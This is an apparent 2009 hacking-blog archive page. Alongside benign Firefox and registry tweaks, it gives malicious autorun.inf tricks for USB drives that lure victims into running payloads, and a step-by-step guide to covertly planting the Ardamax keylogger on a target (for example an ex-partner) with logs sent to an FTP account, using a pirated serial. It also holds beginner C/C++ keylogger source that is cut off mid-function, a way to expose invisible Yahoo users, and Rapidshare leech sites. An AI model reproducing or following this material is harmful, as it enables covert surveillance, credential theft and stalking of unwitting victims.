xmlns:fb=’http://www.facebook.com/2008/fbml’ April 2009 | Ethical Security

search

Custom Search

Sunday, April 19, 2009

8 hacks to make Firefox amazingly fast

Double your browser's speed in just five minutes

For about five minutes work and for the cost of precisely nothing at all. Here's what you need to do to make your Firefox extreamly fast.

1. Enable pipelining

Browsers normally sends a request to a server then wait for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.

Keep in mind that some servers don't support pipelining, though, and if you regularly visit a lot of these then the tweak can actually reduce performance. Set network.http.pipelining and network.http.proxy.pipelining to false again if you have any problems.

2. Render quickly

Large, complex web pages can take a while to download. Firefox doesn't want to keep you waiting, so by default will display what it's received so far every 0.12 seconds (the "content notify interval"). While this helps the browser feel snappy, frequent redraws increase the total page load time, so a longer content notify interval will improve performance.

Type about:config and press [Enter], then right-click (Apple users ctrl-click) somewhere in the window and select New > Integer. Type content.notify.interval as your preference name, click OK, enter 500000 (that's five hundred thousand, not fifty thousand) and click OK again.

Right-click again in the window and select New > Boolean. This time create a value called content.notify.ontimer and set it to True to finish the job.

3. Faster loading

If you haven't moved your mouse or touched the keyboard for 0.75 seconds (the content switch threshold) then Firefox enters a low frequency interrupt mode, which means its interface becomes less responsive but your page loads more quickly. Reducing the content switch threshold can improve performance, then, and it only takes a moment.

Type about:config and press [Enter], right-click in the window and select New > Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a second) and click OK to finish.

4. No interruptions

You can take the last step even further by telling Firefox to ignore user interface events altogether until the current page has been downloaded. This is a little drastic as Firefox could remain unresponsive for quite some time, but try this and see how it works for you.

Type about:config, press [Enter], right-click in the window and select New > Boolean. Type content.interrupt.parsing, click OK, set the value to False and click OK.

5. Block Flash

Intrusive Flash animations are everywhere, popping up over the content you actually want to read and slowing down your browsing. Fortunately there's a very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and it'll block all Flash applets from loading, so web pages will display much more quickly. And if you discover some Flash content that isn't entirely useless, just click its placeholder to download and view the applet as normal.

6. Increase the cache size

As you browse the web so Firefox stores site images and scripts in a local memory cache, where they can be speedily retrieved if you revisit the same page. If you have plenty of RAM (2 GB of more), leave Firefox running all the time and regularly return to pages then you can improve performance by increasing this cache size. Type about:config and press [Enter], then right-click anywhere in the window and select New > Integer. Type browser.cache.memory.capacity, click OK, enter 65536 and click OK, then restart your browser to get the new, larger cache.

7. Enable TraceMonkey

TraceMonkey is a new Firefox feature that converts slow Javascript into super-speedy x86 code, and so lets it run some functions anything up to 20 times faster than the current version. It's still buggy so isn't available in the regular Firefox download yet, but if you're willing to risk the odd crash or two then there's an easy way to try it out.

Install the latest nightly build (ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/), launch it, type about:config in the address bar and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true, and that's it - you're running the fastest Firefox Javascript engine ever.

8. Compress data

If you've a slow internet connection then it may feel like you'll never get Firefox to perform properly, but that's not necessarily true. Install toonel.net (toonel.net) and this clever Java applet will re-route your web traffic through its own server, compressing it at the same time, so there's much less to download. And it can even compress JPEGs by allowing you to reduce their quality. This all helps to cut your data transfer, useful if you're on a limited 1 GB-per-month account, and can at best double your browsing performance.

20 registry hacks to make your PC more awesome as never before

Exploring the lesser-known Control Panel applets is another useful technique, and browsing the command line applications in Windows' System32 folder can be interesting. But let's be realistic. There's nothing that quite compares to the Registry.
It's packed with useful settings that can improve performance, fix security holes and change even the most fundamental Windows behaviour for the better. And many of these features simply can't be accessed in any other way. Be careful, though: the Registry has more than its fair share of traps.

If you're not cautious, you could cause more problems than you solve. But with a little care you can get on with creating a better system that's tailored towards your needs.Here are some great registry hacks

1. Improve security

If strangers have physical access to your PC, it's easy for them to plug in a USB flash drive and make copies of your data. If you're using Windows XP SP2 or later, though, there's a simple way to prevent this from happening.

Go to 'HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies', create a DWORD value called 'WriteProtect' and set it to 1. You'll be able to read USB drives, but not write to them any more.

2. Tame UAC

Windows Vista's User Account Control raises so many alerts that many people just turn it off. But do that and you'll also lose useful features like IE's protected mode. If you really can't live with UAC, try disabling the alerts for administrators: you won't get any more hassle, but UAC will run in the background and you'll still get its other features.

To do this, set 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin' to 0. You can restore normal UAC behaviour by setting it to 2.

3. Change the owner

Install Windows on your PC and you'll be asked to enter your name, which is then stored as the registered owner (run WinVer to see this on your system). If you've got a second-hand PC, you probably want to change the name stored as the registered owner. There's no obvious way to do this, and that's where the Registry comes in.

Browse to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion' and you'll see both a 'RegisteredOwner' and 'RegisteredOrganization' value. Double-click either to change them.

4. Sort files properly

Sorting filenames in Explorer can be a problem. By default, it will place 'File_v2.txt' before 'File_v15. txt': that's not ASCII ordering, but it seems to be sensible. But what if the 'v' refers to a version number, and actually File_v15.txt should come first? Suddenly Explorer's default system doesn't work at all.

To restore regular ASCII file ordering, go to 'HKLM\Software\Microsoft\Windows\Currentversion\Policies\Explorer', create a DWORD value called 'NoStrCmpLogical' and set it to 1. Delete the key to restore the standard Explorer approach.

5. Troubleshoot startup

If Windows is taking its time to start up or shut down, there might be a problem. To find out what's going on, go to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System', create a DWORD value called 'verbosestatus' and set it to 1. Restart your PC and Windows will tell you what it's getting up to.

6. Manage folder types

Windows Vista's Explorer will 'intelligently' choose your folder type based on its contents. But this means that a Download folder will change to a Music folder if you grab a few MP3s. To fix this, go to 'HCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell', delete the 'Bags' subkey and then create a new Bags key in the same location.

Create a key called 'AllFolders' beneath Bags, and a key called 'Shell' below that. Click it to open 'HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shell\ Bags\AllFolders\Shell'. Right-click the right-hand pane, choose 'New | String Value' and call this 'FolderType'. Then double-click FolderType and set its value to 'NotSpecified'. You'll still be able to change the folder type, but Vista will no longer assign one. (See steps 10 to 20 here if you need more help.)

7. Easy encryption

Some versions of Windows have always allowed you to encrypt files, but it's an awkward process; you must right-click the file, select 'Properties', click the 'Advanced' button, check 'Encrypt contents to secure data' and then press 'OK' twice.

For a simpler alternative, go to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced', create a new DWORD called 'EncryptionContextMenu' and set it to 1. Now you can just right-click a file and select 'Encrypt'.

8. Access folders fast

Get speedy access to any folder by pinning it to the Start menu. Run REGEDIT, go to 'HKCR\Folder\shellex\ContextMenuHandlers', right-click 'ContextMenuHandlers' and click 'New | Key'.

Type '' (as ever, without quotation marks) and press [Enter]. Now hold down [Shift], right-click a folder and select 'Pin to Start Menu'.

9. Speed up copy times

Vista gives a high priority to your soundcard, so you should get glitch-free audio no matter what you're doing. This can cause slower network copy speeds, however.

To tweak this, browse to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Multimedia\SystemProfile'. Try setting 'NetworkThrottlingIndex' to more than 10 – 50 or 60 should be effective – then reboot and test your network speeds again. Read more here.

10. Fix the drive listing

If Explorer no longer lists your DVD drive (or thinks that it's a DVD-ROM and can't burn discs), go to 'HKLM\System\CurrentControlSet\Control\Class\' and delete the 'UpperFilters' or 'LowerFilters' settings.

This usually works, but it may break whatever application caused the problem in the first place. If a program stops working, check to see if it has an update, then reinstall it.

11. Access display settings quickly

Right-click the desktop in Windows Vista and you can't directly access the display settings. Windows 7 will fix this, but in the meantime go to 'HKCR\Directory\Background\Shell', right-click 'Shell', select 'New | Key' and call it 'Display Settings'.

Double-click '(Default)' in the right-hand pane and enter 'Display Settings' in the Value Data box. Now right-click Display Settings in the left-hand pane, select 'New | Key' again and call this key 'command'.

Double-click this new key's (Default) value and enter this text: 'rundll32 shell32.dll,Control_ RunDLL DESK.CPL,@0,3'. (That's a zero following the @ sign, and take care to use the right cases.) Click 'OK' and right-click the desktop to see the new Display Settings option.

12. Multiple Live Messenger log-ins

By default, Windows Live Messenger only lets you log into one account at a time. To rectify this situation, go to 'HKLM\Software\Microsoft\WindowsLive\Messenger', create a DWORD value called 'Multiple Instances' and set it to 1. Delete the value to restore things to the way they were beforehand.

13. Clean the menus

You've uninstalled an application, but it's left you a gift: several now-useless right-click context menu entries. To fix this, go to 'HKCR\*' and 'HKCR\Directory'. Expand the shell, then the 'shellex\ContextMenuHandlers' keys and look for any keys beneath these that relate to your unwanted command.

On our PC, the key 'HKCR\*\shellex\ContextMenuHandlers\7-Zip' links to the 7-Zip context menu, for instance, so to get rid of that we would right-click the 7-Zip part in the left-hand pane and click 'Delete'. But be careful – only delete a key if you're really sure it's the right one.

14. Speed up backups

Windows XP's NTBACKUP improves its performance by maintaining a list of system files it knows you won't want to back up (such as the paging file). Add your own files and folders that you're not bothered about and you'll get even better results.

View the list at 'HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup'.

15. Change the default installation folder

Most installations default to the Program Files folder, but if you want to point this elsewhere, navigate to 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion', change the 'ProgramFilesDir' entry to point at your chosen folder and reboot.

16. Rename drives

Add a memory card reader to a PC and Explorer will often cram the Computer folder with similar sounding drive names ('Removable Drive D:', 'Removable Drive E:' and so on), making it difficult to tell them apart. But it doesn't have to be that way.

If drive G: is a CompactFlash slot, say, then a few Registry tweaks can change it to read 'CompactFlash (G:)', making things much clearer. Start at 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' and create a key called 'DriveIcons'.

Within that, create a key with the drive letter ('G' in this example), and within that, create a new key called 'DefaultLabel'. Double-click this key's (Default) value entry, give it the name 'CompactFlash' (or whatever you like) and click 'OK'. Restart Explorer or press [F5] to see the change.

17. Wipe the page file

Windows stores memory pages in its paging file as you work. That's fine unless an intruder gets access to your system. If so, they may then be able to browse the paging file and extract confidential information.

To avoid this, go to 'HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement', set the 'ClearPageFileAtShutdown' value to 1 and reboot. Windows will now wipe the page file every time it shuts down, lengthening the process but increasing your security.

18. Crash on cue

Blue-screen crashes are usually bad news, but occasionally you might want to initiate one yourself. You might need to test Windows' error reporting, for example. There's a Registry trick that can help achieve this.

Go to 'HKLM\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters', create a DWORD called 'CrashOnCtrlScroll' and set it to 1. Reboot your computer, and to crash it just hold down the right [CTRL] and press [Scroll Lock] twice. Use this sparingly: it's a crash like any other, and there's a chance of hard drive corruption. To be safe, delete the CrashOnCtrlScroll value when you're done.

19. Save CPU time

The average PC has several programs wanting to use the processor at any one time, and so Windows allocates each a period of CPU time – a 'quantum' – before moving to the next. By default this is very short, which makes for a responsive PC, but it sometimes means that Windows wastes time just switching between processes.

The solution? You can try what Windows Server does: set up your system to use a long quantum. Set 'HKLM\SYSTEM\CurrentControlSet\Control\PriorityControl\Win32PrioritySeparation' to 16 (hex).

Longer quantums mean fewer switches between programs and so less wasted time. It can push some programs too far, though, and you might begin to notice games lagging or video playback becoming less smooth. If you spot any problems, just restore the original Win32PrioritySeparation value (probably 26 hex).

20. Disable AutoRun

Windows' AutoRun feature is a potential security risk because it automatically runs code when you connect removable devices to your PC. If you can put up with the inconvenience of doing things manually then it's safest to disable it.

On some systems, this can only be done from the Registry. To do so, go to 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\IniFileMapping' and create a key called 'Autorun.inf'.

Next, double-click the new key's (Default) value and enter the new value '@SYS:DoesNotExist'. Now delete the Registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2'. Windows now won't automatically run any code on CDs, DVDs or removable drives; you will have to manually launch it.

Saturday, April 18, 2009

How to Detect invisible persons in yahoo

trace invisible users in yahoo

Many people nowdays prefer to stay offline while using Yahoo! Messenger - mostly done to avoid someone. There are many ways of finding people who are online but yet invisible.

First Method: Doodle Method

1. Double Click on the user whose status you want to check.
2. A message window will open.
3. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.
4. The last step and the most important step. After loading the Doodle IMVironment, there will be two possibilities.
a) If the user is offline, the Doodle area will show “waiting for your friend to load Doodle” continuously.
b) If the user is online (in invisible mode), after few seconds (it can take up to one minute, depending on connection speed), you will get a blank page. So the user is online!

Second Method: Voice Chat Method

1. Double Click on the user whose status you want to check.
2. Click on “Voice” icon on the toolbar, or select “Contact” menu and select “Enable Voice Chat” .
3. The deciding part… there are 2 possible results:
a) If the user is offline, you will get this message: “Internal server error. Cannot obtain voice token to start voice chat.”
b) If the user is invisible (actually online), you will see the Voice Toolbar.

Third Method: Conference Invitation

1. Right Click on the user whose status you want to check.
2. When the menu appears, select Invite to Conference.
3. A window will appear. See at the right pane, the username you selected will be there. Now, click Invite.
4. The deciding part… there are 2 possible results:
a) If the user is offline, you will get this message: “None of the users in the invite list are available to join the conference. Please try at a later time.”
b) If the user is invisible, you will get a window similar saying: “You are now logged into voice conference -

beside this you can use website like
www.scanyahoo.co.cc
www.scanyahoo.com
www.ydetector.com

to know invisible guys

Thursday, April 16, 2009

Quick Tutorial to hacking for autorun for USB Flash drives


Autorun will not work with “regular” USB flash drives the way that they do with CD-ROMs, but there are some tricks that you can do that will come very close. I say “regular” in that as many may know there are ways of modifying U3 drives so that they appear as CD-ROMs on Windows systems and can thus use autorun to silently run your “tools” without any indication anything is happening. The U3 hack however is a bit more complicated, I will do another “How to” on that later. For now let’s just discuss how we can create an autorun.inf file on a regular ‘ol USB flash drive that will do some interesting things.

Also it is important to mention that some of these techniques will even work if autoplay is disabled!

First, although we cannot have an application run automatically with a traditional USB drive, we can make it so that when a USB drive is plugged we have Windows make a suggestion to the user and all they need to do is click “OK” to a specific application or script you have deployed to the flash drive.

First in Notepad create a file called autorun.inf and save it to the root of your USB flash drive of choice. In the autorun file put this:

[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!

The first parameter is “icon” this tells Windows what icon to use as the icon image for the drive etc. This is important for the social engineering portion of the trick, you must consider your target. The image you choose should help instill trust in the application they are about to run, maybe a tantalizing icon of a scantly clad babe, a puppy, or my favorite a cute little cartoon devil holding a USB flash drive.

The “open” parameter indicates the program you wish to run, this can be an executable, or as in this case a .bat file. You could even call a .bat file which calls a series of executables. Go crazy.

The next parameter is “action” this is what will trigger the autorun dialog to appear. This text will appear in the dialog box along with your icon, so you probably want make this friendly, something like “Fun Game,” you probably don’t want to put something like “Click ‘OK’ to install backdoors and trojans!”.

Now unplug your flash drive and then replug it in, a dialog box like this should now appear:


So this is not as good as automatically running the application, but is useful nonetheless and there have actually been successful simulations where this has been used. A security consultancy used this technique as a proof of concept to test a credit union client of theirs. Several drives used this simple technique to run exectue a trojan that sent some simple data to an external email account. They scattered the drives in the parking lot, several employees picked the drives up on their way into work and within a short amount of time the email account they had set up was receiving emails.

Now we have our basic autorun.inf setup. But notice that if you click cancel and then click on the drive you just see the contents of the drive. However we can take this one step further, if the user is smart and their spidey senses are tingling from the dialog menu that appears and they click cancel, with the addition of one more line of code to the autorun.inf file that will automatically execute the code we specify when they click the drive either from “My Computer” or Explorer. This is different than a true autorun as it still requires a user to take an action to exectue the application, but still a significant security risk.

Add these lines to your autorun.inf file

[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shell\open\command=howdy.bat

OK save it and then unplug and plug the drive back in again. This time when the prompt appears hit “cancel”. Now go to double click the drive under “My Computer”. The application will automatically execute. By the way, this second portion will still work even if autoplay is disabled on a system and is actually more dangerous than the dialog in my opinion.

So what if we don’t want to execute a command on the drive and just open a webpage? You could execute Explorer in your .bat file to do this, or in the exectuble you run, but there is a quick and easy way to do this in the autorun.inf file. Replace the last line with this instead:

[autorun]
icon=lilguy.ico
open=howdy.bat
action=Click “OK” to play this fun game!
shellexecute=http://www.usbhacks.com

There we have it. An introduction to the wonderful world of autorun.inf hacks for USB flash drives. Again this should only be tested on your system, or systems you have permission to use this on, we are not responsible for your stupidity. Removable media devices don’t deploy malicious code and steal data, people do

Disclaimer: This tutorial is designed to show existing vulnerabilities and should only be used on systems you own, or have permission to execute this on. Removable media devices don’t deploy malicious code and steal data, people do.

Nmap for USB

Nmap is a free open source tool used for network exploration and vulnerability auditing. Using Nmap a user can quickly scan large networks as well as target specific hosts. Nmap uses IP packets in unique ways to figure ouw what hosts are available on a given network and can determine what operating system it is running as well as determine what services (including versions) it is running and can also discover what type of packet filters and firewalls are in use. Recent versions have been modified to run straight from a USB flash drive download it here

Wireshark for USB

WiresharkWireshark is a free protocal analyzer, also called a packet sniffer that is used for network troubleshooting, analysis and protocol development. The tool allows the user to see all traffic being passed over a network when putting a network card into what is known as “promiscuous mode”.

S0me versions now have the capability to run independently from a USB flash drive and no longer require that WinPCap or other third-party packet capture drivers to be installed on a system

Torpark an ultimate browser for hackers

The Torpark browser is a modified version of Firefox that can run off of a USB drive and uses anonymous proxies and encryption to mask user behaviour. The browser has been developed by Hacktivisimo, a group of hackers, human rights workers, lawyers and artists.

The browser uses the Tor network of routers setup by the Electronic Frontier Foundation to anonymize web traffic.All you need to do is copy the files to your USB thumb drive. The browser will encrypt traffic between the computer and the Tor router network, this makes it difficult to spy on traffic and pinpoint who is doing what in terms of browsing behaviour.

The Tor netwok also regularly changes the users IP address which makes it even more difficult to track browsing sessions.On one hand this tool is a wonder for online security, however it has a darkside. One feature of the Torpark browser is that it can run directly off of a USB flash drive. This could cause headaches for some IT administrators who may be restricting employee’s browsing behaviour for intellection property issues , or acceptable use policies. Since the browser does not need to be installed on the system and can simply be run from a USB flash drive, it opens the door for a long list of potential endpoint security threats.

Wednesday, April 8, 2009

List of Rapidshare Premium Link Converging Websites

List Of the site offering premium Link maker service
use them and download your stuff easily

1. khongbiet.com (.com currently out of bandwidth)
2. rapidhack (.com / .de)
3. free-premium-links (.com 5attempt /day)
4. Rapidshare.co.in ( .com 5 attempt / day)
5. http://www.downloadmyupload.com
6. http://computeraxes.com/rapid
7. http://www.premiumrapid.com
8. http://www.rapidshack.us/
9. http://megaez.com/
10. http://khongbiet.com/
11. http://mymegalink.net/
12. http://rapid-hook.com/
13. http://www.rapidl.com/
14. http://www.rapidrip.com/
15. http://www.rapidsharepremiumlinkgenerator.com/
16. http://rapidlysharing.com/
17. http://www.rapidshareplus.com/
18. http://www.fastlister.net/rs/
19. http://www.lcheat.com/rs7/
20. http://rapid-ripping.com/
20. http://x92.org/
21. http://www.rapidleechers.com/
22. http://www.rapidshare-premium-downloader.com/
23 http://www.premium4me.com/rapid.html
24. http://www.premiumrapid.com/rapid.html
25. http://www.download-crazy.com/rapid
26. http://www.grab-w.net/
27. http://www.t5f.net/
28. http://www.rapid-premium.wb.st/

Ardamax Keylogger Tutorial

A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let's begin.

Head on over to:


CODE
http://www.ardamax.com/keylogger/


And scroll to the bottom. Download the free trial.

After downloading, open the program and install it. Simple enough, right? After installing, go to wherever you installed it at, and open it. It should open at the bottom right corner of your screen, down by the time. If not, press ctrl+shift+alt+h. Now, leave that alone.

Next, go to:


CODE
http://www.theserials.com/serial/serial_ardamax.html


Download the appropriate serial.

Now, open it, and it should give you a name and a jumble of letters and numbers.
A step-by-step guide to successfully creating a deployment package, sending it, and receiving information using Ardamax Keylogger. Now, in this guide, I only use one method of recieving information, and that's an FTP. I also do not protect the files. Any suggestions and comments are appreciated. Let's begin.

If you want to attach the keylogger to an existing file, go ahead and place that on your desktop.

~NOTE~

Again, right click the icon at the bottom-right.

Click "Remote Installation".

Click next.

Now, if you want to attach your keylogger to an existing file, tick the box that says "Append keylogger engine to.." etc etc.

If you tick it, click Browse, and select the file.

If not, continue down. The installation folder on target computer needs to remain Windows System Folder for added security, so leave it be.

Add any additional components you would like. I just leave mine as "log viewer" since all I grab are passwords from games.

From this point, click next.

Now, this part is self explanatory. I tick all of the boxes, as to hide it from everything visible, otherwise they can just see it and be like "Wtf", uninstall, etc.

Can't have that, now can we?

Click next.

For Security, do what you want. I leave all of it as-is and click next again.

Now, untick the "Check for updates" box, else it will check for updates on their computer and they will know that they are bugged.

Click next.

Tick the "Start in hidden mode" box, and leave the "Run on windows startup" as-is.

You may pick a date to self destruct, if you like. Sounds noisy, right? It simply removes itself on selected date. If not, leave it alone, and it will never self destruct.

Click next.

Tick the "Send logs every.." box, and choose how frequently you would like to recieve information that has been sent.

Select 'FTP' and de-select everything else as a delivery method.

You may choose what you want to see. I take out screenshots. Causes lag for me.

Leave log format alone.

You may choose to send logs if it exceeds a certain size, or if you want it to send no matter what, untick the box, which is what I do.

Continue on! (next.)

Now the fun part. -_-.

Head on over to:


CODE
http://phpnet.us/


Make an account, etc etc.

Save your FTP Account name and password. You'll need it in a moment.

This site will be the site that holds all information recieved by the keylogger.

When you're done, scroll down a bit.

Under "FTP Accounts", click "File Manager".

Near the top, click the "New Dir" button, and create a directory by any name you want. My favorite is "lolbeans".

Now, hold that thought. Bring the keylogger back.

In Ftp Host, put in:

ftp.phpnet.us

In "Remote Folder", put in the new directory's name you made. So, in this scenario, "lolbeans" without the "'s.

Fill in your Username and Password.

I leave Passive Mode checked because I'm not sure what it does, rofl. :[

Leave port alone as well. It's default.

Now to make sure everything is correctly done, click test. It should tell you it all went through. And to double check, you can refresh your open window. Click your "lolbeans" directory and there should be a test file in it.

Click next, if you're still alive.

Tick anything and everything you want.

Next.

If you selected screenshots to be enabled, pick how you want them delivered. Click next. If not, ignore this step.

Browse where you want the keylogger to be placed. You can also change the icon, which is nifty. If you're apologizing to a bitch ex girlfriend/boyfriend of yours, you can change the icon to a notepad and name it "Apology", and they fall for it.

Next.

This screen will go over with you everything that you have chosen. Make sure it's all correct.

Click Finish.

Now, if you appended the keylogger to something, you're going to need to put the "install" (feel free to rename it so it's not so obvious) and appended file into a .zip or .rar file.

If not, you have the simple "Install" on your desktop. Also, feel free to rename it to something like "Apology" or "OMFGFunnypicture!!!.jpg"

Upload the file or .rar/.zip somewhere, and let your target download it. They will double click it, and on their end, nothing will happen, but secretly, they have been keylogged.

Check your FTP Directory that you made as frequently as you told it to send logs, and you'll have everything you need.
First test it out on yourself.

How to Avoid and Remove a Keylogger

A keylogger is a dangerous program that runs invisibly as a low level system process. Usually started up when your computer Starts - so its impossible to detect it - a keylogger logs all the keystrokes that you type on keyboard and then sends that info to the person who infected you with the keylogger.



Keyloggers can be used to steal personal information such as your social security number, credit card number, and passwords. Keyloggers are especially dangerous to anyone who uses online cash sites like PayPal for a large amount of money transfers.


When you suspect that you are infected with a keylogger, do NOT type any personal information. Even if you are typing in a normal word document, the keylogger still track everything and where ever and what ever you type.


If you need to login to your Email or somewhere secure and password protected, this is the only way to get rid of the keylogger.



Click Start -> All Programs -> Accessories -> Accessibility -> On-Screen Keyboard


Doing this opens up a keyboard on your screen so that you can click whatever letter you would like to type. Since a keylogger does not track where and what you click, this helps you to get rid of it in times of urgency. Typing with the on-screen keylogger is a great loop hole for a keylogger. The only alternative is the remove the keylogger completely.


Detecting a keylogger is more important before you remove it because doing that is not such easy thig. It can be installed in many places on your computer, usually located in one of the system files. However, there is a much easier way to detect if a keylogger is running or not. Right click on your menu bar and click Task Manager or simply press Ctrl + Alt + Del. You should take a look on all the applications which are running at the moment. Click Processes tab. This gives you info about all the programs, hidden and visible that your computer is currently running.


Unless you know a lot about which processes the computer runs and does not run you will have trouble figuring out what is a keylogger and what not. The keylogger will show up on the list of processes as well as many other programs and background processes. However, you may not be able to find the difference between all the processes.


So you need to know which is a keylogger before you can stop it. There are many sites available on the Internet that provides a vast amount of information on each and every process that you may encounter. One of these sites is Liutilities. This site provides some background information on each process as well as telling you the author and which program it is part of. One of the best features of this site includes a recommendation about what to do with that process. Most of the time, the process you look up will be harmful and simply part of the operating system or another program you are running.

Another fantastic site for information on processes is Neuber. As with Liutilities, Neuber gives you background information on that process. A special feature they have is user created comments. Anyone can rate a process in terms of its security a leave a comment about how to deal with the process. Generally, these comments are very accurate. Neuber also provides a 'security rating' for each process based on the average rating by users.


However, some find it hard and long drawn out to research each process individually. There is an alternative program called Security Task Manager that is free to download. It will display information about each of the processes that are currently running, as well as telling you if they are dangerous or not. You will immediately be notified should anything harmful come up. Produced by Neuber, the program also shows the security rating and a random comment made by a user for each process. This program does have its disadvantages though. Processes that the program has never encountered before are not given a security rating or a comment. It is therefore advised that you research these processes individually.


Once you have found the harmful process, click the process and then click the 'End Process' button towards the bottom right. The process you have selected should be terminated immediately.

Once this is complete, you should be safe until you reboot your computer. If you do not delete the keylogger, upon rebooting your computer, the keylogger will start up again.


Once you have stopped the keylogger, run anti-virus and spyware checks on your entire computer. Some free virus scan utilities that are recommended are A2, Dr. Web and AVG. However, highly advanced keyloggers such as TypeAgent, KGB, and SpyOutside can often slip through these scans and remain undetected.

If the anti virus scans fail to show any result, you will need to manually detect and delete the keylogger. Keyloggers are usually located in the system files, so do not delete anything that you aren't 100% sure is the keylogger. Doing so may lead to errors in other areas of the computer. Go to 411-spyware and search for the type of keylogger that has infected your system. If it is listed, there should be instructions about how to manually remove the keylogger.


A great way to check if the keylogger has been completely removed from the system is to reboot. Remember the name of the keylogger's process and reboot the computer. If the process is not there when the computer has rebooted, you are safe.

Keylogging fun for C/C++ Beginners

The examples below are for beginners in C/C++ with some basic knowledge of the windows - API.
1. Global hook
Hook: A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.
Available hooks:
WH_CALLWNDPROC
WH_CALLWNDPROCRET
WH_CBT
WH_DEBUG
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER
To install a hook you call this API-function:
HHOOK SetWindowsHookEx(
int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle to application instance
DWORD dwThreadId // identity of thread to install hook for
);
- idhook
Specifies the type of hook procedure to be installed. We choose “WH_KEYBOARD_LL” (13).
- lpfn
The LowLevelKeyboardProc hook procedure is an application-defined or library-defined callback function used with the SetWindowsHookEx function. The system calls this function every time a new keyboard input event is about to be posted into a thread input queue. The keyboard input can come from the local keyboard driver or from calls to thekeybd_event function. If the input comes from a call to keybd_event, the input was “injected”.

The HOOKPROC type defines a pointer to this callback function. LowLevelKeyboardProc is a placeholder for the application-defined or library-defined function name.
LRESULT CALLBACK LowLevelKeyboardProc(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);
- hMod
In this case, our instance handle.
- dwThreadId
Specifies the identifier of the thread with which the hook procedure is to be associated.
If this parameter is zero, the hook procedure is associated with all existing threads.
Now we know enough to create our first keylogger, using a global keyboard hook:
————————————————————————————————————————–

#include
#include
#define FILENAME “keylog.txt”
void CheckKey(int key);
LRESULT CALLBACK KeyboardHook(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);
typedef struct tagKBDLLHOOKSTRUCT {
DWORD vkCode; // virtual key code
DWORD scanCode; // scan code
DWORD flags; // flags
DWORD time; // time stamp for this message
DWORD dwExtraInfo; // extra info from the driver or keybd_event
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

HHOOK hHook;
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow )
{
hHook = SetWindowsHookEx(13, KeyboardHook, hInstance , 0);
while (GetMessage(NULL,NULL,0,0)) ; // NOP while not WM_QUIT
return UnhookWindowsHookEx(hHook);
}
LRESULT CALLBACK KeyboardHook (int nCode, WPARAM wParam, LPARAM lParam )
{
if (nCode == HC_ACTION)
if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)
CheckKey (((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(hHook, nCode, wParam, lParam);
}
void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,”a+”);
// translate virtual key code to ascii
// and write it to file..
fclose(pfile);
}
————————————————————————————————————————–
2.
GetAsyncKeyState()
The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.
SHORT GetAsyncKeyState(
int vKey // virtual-key code
);
- vKey
Specifies one of 256 possible virtual-key codes.
This is our second keylogger, now using GetAsyncKeyState() :
————————————————————————————————————————–
#include
#include
#define FILENAME "keylog.txt"
void CheckKey(int key);
void main()
{
while(1)
{
Sleep(10); // avoid 100% cpu usage
for(int key=8; key<=190; key++)
if (GetAsyncKeyState(key) == HC_ACTION)
CheckKey(key);
}
}
void CheckKey(int key)
{
// …
}
==========================================================================================================================
The CheckKey() function may look like :

void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,”a+”);
if (key==8)
fprintf(pfile,”%s”,”[del]“);
if (key==13)
fprintf(pfile,”%s”,”\n”);
if (key==32)
fprintf(pfile,”%s”,” “);
if (key==VK_CAPITAL)
fprintf(pfile,”%s”,”[CAPS]“);
if (key==VK_TAB)
fprintf(pfile,”%s”,”[TAB]“);
if (key==VK_SHIFT)
fprintf(pfile,”%s”,”[SHIFT]“);
if (key==VK_CONTROL)
